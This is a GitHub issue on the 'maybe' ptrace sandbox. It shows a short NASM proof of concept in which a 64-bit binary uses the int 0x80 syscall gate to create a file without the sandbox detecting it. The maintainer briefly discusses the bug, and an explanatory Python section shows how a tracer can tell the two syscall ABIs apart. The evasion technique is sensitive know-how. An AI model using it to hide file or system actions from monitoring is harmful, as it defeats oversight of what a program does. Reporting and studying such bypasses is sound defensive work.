This repository has been archived by the owner on Nov 11, 2018. It is now read-only.

easy to bypass in linux 64 bit #35

Open
hc0d3r opened this issue Aug 27, 2016 · 2 comments

Comments

@hc0d3r

hc0d3r commented Aug 27, 2016

Using int 0x80 in an ELF64 binary, it's easy to bypass. Example:

test.asm

```nasm
section .rodata
    x db '/tmp/abcd', 0x0   ; path handed to open()

section .text
    global _start

_start:
    ; open("/tmp/abcd", O_CREAT, 0644) through the legacy int 0x80 gate,
    ; which dispatches on the 32-bit syscall table even in a 64-bit process
    mov eax, 5          ; i386 number 5 = open (in the 64-bit table 5 is fstat)
    mov ebx, x          ; path; static non-PIE binary, so the address fits in 32 bits
    mov ecx, 64         ; O_CREAT
    mov edx, 0o644      ; mode; NASM treats a bare 0644 as decimal, so spell octal explicitly
    int 0x80

    ; exit() through the same gate: i386 number 1 = exit (64-bit table: write)
    xor eax, eax
    inc eax
    int 0x80
```

```console
$ nasm -f elf64 test.asm
$ ld -o test test.o
$ rm -f abcd
$ [ -e "abcd" ] && echo file found
$ maybe ./test
maybe has not detected any file system operations from ./test.
$ [ -e "abcd" ] && echo file found
file found
```
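One way a ptrace-based sandbox misses the calls above, shown as an added example that is not code from maybe, python-ptrace or this issue: a tracer that looks up every stop in the x86-64 table sees test.asm's two syscalls as fstat and write, whereas checking which instruction entered the kernel (here a simplification that peeks the two code bytes before rip; on Linux 5.3 and later PTRACE_GET_SYSCALL_INFO reports the ABI directly) identifies them as the i386 open and exit. The syscall-table slices, register snapshots and the address in them are constructed for this example.

```python
from dataclasses import dataclass, field

# Slices of the two x86 syscall tables: the same number names a different
# call depending on which gate entered the kernel.
X86_64_TABLE = {0: "read", 1: "write", 2: "open", 5: "fstat", 60: "exit", 257: "openat"}
I386_TABLE = {1: "exit", 3: "read", 4: "write", 5: "open", 6: "close", 295: "openat"}

# Two-byte kernel-entry instructions; at a syscall-enter stop rip points just
# past the instruction, so a tracer can PTRACE_PEEKTEXT the bytes at rip-2.
ENTRY_INSNS = {
    b"\x0f\x05": "x86_64",  # syscall  -> 64-bit table
    b"\xcd\x80": "i386",    # int 0x80 -> 32-bit table, even from a 64-bit process
    b"\x0f\x34": "i386",    # sysenter -> 32-bit table
}

# The argument registers differ too: reading rdi as the path of an int 0x80
# open() yields whatever the process happened to leave there.
ARG_REGS = {
    "x86_64": ("rdi", "rsi", "rdx", "r10", "r8", "r9"),
    "i386": ("rbx", "rcx", "rdx", "rsi", "rdi", "rbp"),
}
O_CREAT = 0o100

@dataclass
class SyscallStop:
    """One syscall-enter stop as seen through PTRACE_GETREGS (constructed here)."""
    orig_rax: int
    insn: bytes                        # the two code bytes before rip
    regs: dict = field(default_factory=dict)

def classify(stop):
    """(abi, name, args) chosen by the entry gate, not by the number alone."""
    abi = ENTRY_INSNS.get(stop.insn)
    if abi is None:
        raise ValueError(f"unknown kernel-entry instruction {stop.insn.hex()}")
    table = X86_64_TABLE if abi == "x86_64" else I386_TABLE
    name = table.get(stop.orig_rax, f"sys_{stop.orig_rax}")
    return abi, name, tuple(stop.regs.get(r, 0) for r in ARG_REGS[abi])

def naive_name(stop):
    """What a tracer that assumes the 64-bit table for every stop reports."""
    return X86_64_TABLE.get(stop.orig_rax, f"sys_{stop.orig_rax}")

def creates_file(stop):
    """True for an open()/openat() carrying O_CREAT under the ABI actually used."""
    _, name, args = classify(stop)
    flags = {"open": args[1], "openat": args[2]}.get(name, 0)
    return bool(flags & O_CREAT)

# Constructed snapshots of the two stops test.asm produces (the address is made up).
OPEN_STOP = SyscallStop(5, b"\xcd\x80", {"rbx": 0x4000E8, "rcx": 64, "rdx": 0o644})
EXIT_STOP = SyscallStop(1, b"\xcd\x80", {"rbx": 0x4000E8})
```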
@Potherca

Do you have a suggestion for a fix?

@p-e-w p-e-w added the bug label Dec 11, 2016
@p-e-w
Owner

p-e-w commented Dec 11, 2016

That's odd indeed... I was under the impression that syscall was just an alias for int 0x80. If that technique worked in general, all ptrace sandboxes would be ineffective, so the fault must lie either with maybe or with python-ptrace.

@p-e-w p-e-w added this to the v1.0 milestone Dec 11, 2016